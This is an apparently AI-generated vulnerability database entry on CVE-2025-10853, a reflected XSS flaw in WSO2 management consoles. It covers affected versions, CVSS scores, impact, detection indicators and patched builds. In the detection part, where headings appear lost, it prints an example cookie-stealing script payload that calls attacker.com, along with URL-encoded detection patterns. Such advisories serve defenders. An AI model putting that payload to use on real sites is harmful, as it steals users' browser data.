
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-10853 is a reflected cross-site scripting (XSS) vulnerability in the management console of multiple WSO2 products, caused by improper output encoding. By tampering with specific request parameters, an unauthenticated remote attacker can inject arbitrary JavaScript into server responses. The vulnerability was disclosed on November 5, 2025, and affects a broad range of WSO2 products including API Manager (3.1.0–4.5.0), Identity Server (5.10.0–7.1.0), Enterprise Integrator (6.6.0), API Control Plane (4.5.0), Traffic Manager (4.5.0), Universal Gateway (4.5.0), Open Banking AM/IAM (2.0.0), and Identity Server as Key Manager (5.10.0). It carries a CVSS v3.1 base score of 6.1 (Medium) per NIST NVD, and 5.2 (Medium) per WSO2 as the CNA (WSO2 Advisory, Red Hat CVE).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically the reflected variant (CAPEC-591). The vulnerability arises because the WSO2 management console fails to properly encode user-supplied input before including it in HTTP responses, allowing injected JavaScript to execute in the victim's browser context. Exploitation requires no authentication and no special privileges, but does require user interaction — a victim must be tricked into clicking a crafted URL containing the malicious payload. The attack vector is network-based, with low attack complexity (WSO2 Advisory, Red Hat CVE).
Successful exploitation can result in UI manipulation, redirection of users to malicious websites, and theft of sensitive data accessible from the browser (e.g., tokens, form data, or page content). Because session-related cookies are protected with the httpOnly flag, direct session hijacking via cookie theft is mitigated, though other session-related attacks may still be feasible. The scope is changed (S:C), meaning the injected script executes in the victim's browser context rather than the server, affecting confidentiality and integrity at a low level with no direct availability impact (WSO2 Advisory).
As of the time of reporting, there is no public proof-of-concept exploit and no evidence of in-the-wild exploitation. The EPSS score is approximately 0.022% (0.000220), indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been reported (Red Hat CVE, WSO2 Advisory).
<script>document.location='https://attacker.com/?c='+document.cookie</script> (URL-encoded).%3Cscript%3E, javascript:, onerror=, onload=) in query parameters; outbound connections from the management console host to unknown external IPs following user interaction.WSO2 has released patched versions for all affected products; administrators should update to the fixed builds detailed in the WSO2 security advisory WSO2-2025-4486. Key patched versions include API Manager 3.1.0 → 3.1.0.344+, 3.2.0 → 3.2.0.445+, 4.0.0 → 4.0.0.365+, 4.1.0 → 4.1.0.227+, 4.2.0 → 4.2.0.167+, 4.3.0 → 4.3.0.79+, 4.4.0 → 4.4.0.43+, 4.5.0 → 4.5.0.26+; Identity Server 5.10.0 → 5.10.0.373+, 5.11.0 → 5.11.0.417+, 6.0.0 → 6.0.0.247+, 6.1.0 → 6.1.0.246+, 7.0.0 → 7.0.0.122+, 7.1.0 → 7.1.0.29+; Enterprise Integrator 6.6.0 → 6.6.0.223+; and other products as listed in the advisory. As interim mitigations, restrict access to the management console to trusted networks only, implement Content Security Policy (CSP) headers, and monitor console access logs for anomalous activity (WSO2 Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."